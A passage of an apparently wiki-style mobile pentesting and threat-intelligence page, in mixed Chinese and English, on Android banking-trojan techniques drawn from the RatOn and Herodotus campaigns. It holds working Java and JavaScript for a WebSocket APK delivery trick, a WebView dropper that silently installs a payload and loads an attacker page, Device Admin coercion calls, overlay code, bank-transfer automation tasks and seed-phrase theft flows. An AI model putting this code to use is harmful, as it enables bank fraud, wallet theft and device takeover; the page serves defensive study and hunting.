// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

为什么它能够规避简单的防护：
- 未暴露静态 APK URL；有效载荷从 WebSocket 帧在内存中重构。
- 阻止直接 .apk 响应的 URL/MIME/扩展名过滤器可能会漏掉通过 WebSockets/Socket.IO 隧道传输的二进制数据。
- 不执行 WebSockets 的爬虫和 URL 沙箱将无法获取有效载荷。

另请参见 WebSocket 的实战技巧与工具：

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn 案例研究

RatOn banker/RAT 活动（ThreatFabric）是一个具体示例，说明现代 mobile phishing 行动如何将 WebView droppers、基于 Accessibility 的 UI 自动化、overlays/赎金界面、Device Admin 强制手段、Automated Transfer System (ATS)、crypto wallet takeover，甚至 NFC-relay 编排结合起来。本节对这些可复用技术进行抽象。

### Stage-1：WebView → 本地安装桥（dropper）
攻击者展示一个指向攻击者页面的 WebView，并注入一个暴露本地安装器的 JavaScript 接口。点击 HTML 按钮会调用本地代码，该代码安装捆绑在 dropper 资产中的二阶段 APK，然后直接启动它。

最小模式：

<details>
<summary>Stage-1 dropper 最小模式 (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

页面上的 HTML：

<button onclick="bridge.installApk()">Install</button>

安装后，dropper 通过 explicit package/activity 启动 payload:

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Hunting idea: untrusted apps calling addJavascriptInterface() and exposing installer-like methods to WebView; APK shipping an embedded secondary payload under assets/ and invoking the Package Installer Session API.

同意流程：Accessibility + Device Admin + 后续运行时提示

Stage-2 打开一个托管 “Access” 页面 的 WebView。页面上的按钮调用一个 exported 方法，导航受害者到 Accessibility 设置并请求启用该恶意服务。一旦授予权限，malware 会利用 Accessibility 在后续运行时权限对话框（contacts、overlay、manage system settings 等）中自动点击通过，并请求 Device Admin。

• Accessibility 通过在节点树中查找类似 “Allow”/“OK” 的按钮并派发点击事件，编程式地帮助接受后续提示。
• Overlay 权限 检查/请求：

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

另见：

Accessibility Services Abuse

通过 WebView 的覆盖式钓鱼/勒索

操作者可以发送命令以：

• 从 URL 渲染全屏覆盖，或
• 传递内联 HTML，并将其加载到 WebView 覆盖中。

可能用途：胁迫（PIN 输入）、打开钱包以捕获 PIN、勒索消息。应保留一个命令以在缺少覆盖权限时确保授予该权限。

远程控制模型 – 文本伪屏 + 屏幕投射

• 低带宽：定期转储 Accessibility 节点树，序列化可见文本/角色/边界，并作为伪屏发送到 C2（命令例如 txt_screen 一次性，screen_live 持续）。
• 高保真：请求 MediaProjection 并按需开始屏幕投射/录制（命令例如 display / record）。

ATS 剧本（银行应用自动化）

给定一个 JSON 任务，打开银行应用，通过 Accessibility 以文本查询和坐标点击相结合的方式驱动 UI，并在提示时输入受害者的支付 PIN。

示例任务:

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Example texts seen in one target flow (CZ → EN):

• “Nová platba” → “新付款”
• “Zadat platbu” → “输入付款”
• “Nový příjemce” → “新收款人”
• “Domácí číslo účtu” → “国内账户号码”
• “Další” → “下一步”
• “Odeslat” → “发送”
• “Ano, pokračovat” → “是，继续”
• “Zaplatit” → “支付”
• “Hotovo” → “完成”

Operators can also check/raise transfer limits via commands like check_limit and limit that navigate the limits UI similarly.

Crypto wallet seed extraction

Targets like MetaMask, Trust Wallet, Blockchain.com, Phantom. Flow: unlock (stolen PIN or provided password), navigate to 安全/恢复, reveal/show seed phrase, keylog/exfiltrate it. Implement locale-aware selectors (EN/RU/CZ/SK) to stabilise navigation across languages.

Device Admin coercion

Device Admin APIs are used to increase PIN-capture opportunities and frustrate the victim:

• 立即锁定:

dpm.lockNow();

• 使当前凭证过期以强制更改（Accessibility 捕获新的 PIN/密码）:

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• 强制非生物识别解锁，通过禁用 keyguard 的生物识别功能：

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

注意：许多 DevicePolicyManager 控制在近期 Android 上需要 Device Owner/Profile Owner；某些 OEM 构建可能较为宽松。始终在目标 OS/OEM 上验证。

NFC relay orchestration (NFSkate)

Stage-3 can install and launch an external NFC-relay module (e.g., NFSkate) and even hand it an HTML template to guide the victim during the relay. This enables contactless card-present cash-out alongside online ATS.

Background: NFSkate NFC relay.

Operator command set (sample)

• UI/state: txt_screen, screen_live, display, record
• Social: send_push, Facebook, WhatsApp
• Overlays: overlay (inline HTML), block (URL), block_off, access_tint
• Wallets: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Device: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Comms/Recon: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Accessibility-driven ATS anti-detection: human-like text cadence and dual text injection (Herodotus)

攻击者越来越多地将 Accessibility-driven 自动化与针对基本行为生物识别的反检测技术结合。最近一个 banker/RAT 展示了两种互补的文本传送模式以及一个操作员切换，用于模拟带随机节奏的人类输入。

• Discovery mode: 枚举可见节点，使用选择器和 bounds 精确定位输入（ID、text、contentDescription、hint、bounds）后再操作。
• Dual text injection:
• Mode 1 – ACTION_SET_TEXT 直接作用于目标节点（稳定，无需键盘）；
• Mode 2 – 先设置剪贴板并对聚焦节点执行 ACTION_PASTE（在 direct setText 被阻止时可用）。
• Human-like cadence: 将操作员提供的字符串拆分，并以字符为单位发送，每次事件间随机延迟 300–3000 ms，以规避“机器速度打字”启发式检测。可通过逐步用 ACTION_SET_TEXT 增长值来实现，或逐字符粘贴实现。

</details>

用于欺诈掩护的阻断覆盖层：
- 渲染全屏 `TYPE_ACCESSIBILITY_OVERLAY`，由操作者控制不透明度；在远程自动化在下面运行时对受害者保持不透明。
- 通常暴露的命令：`opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

可调 alpha 的最小覆盖层：
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);